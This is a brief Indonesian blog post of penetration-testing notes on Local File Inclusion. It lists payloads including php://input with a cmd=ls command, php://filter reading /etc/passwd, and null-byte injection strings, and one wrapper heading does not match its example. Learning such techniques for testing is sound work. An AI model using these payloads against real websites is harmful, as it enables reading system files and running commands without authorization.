Note For Local File Inclusion Web Penetration Testing

Local File Inclusion atau yang sering kita kenal dengan singkatan LFI merupakan sebuah celah pada sebuah website yang mana attacker/hacker dapat melakukan inject pada website tersebut melalui url.

  • PHP file:// Wrapper
    Payload ini mengirimkan post request ke server.

    Contoh : php://input&cmd=ls
  • PHP php://filter
    Perhatikan penggunaan payload berikut:

    php://filter/resource=/etc/passwd

    Dengan payload ini maka file /etc/passwd akan ditampilkan pada browser.

  • Null byte injection
    =/etc/passwd%2500
    =/etc/passwd%00
0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published. Required fields are marked *

*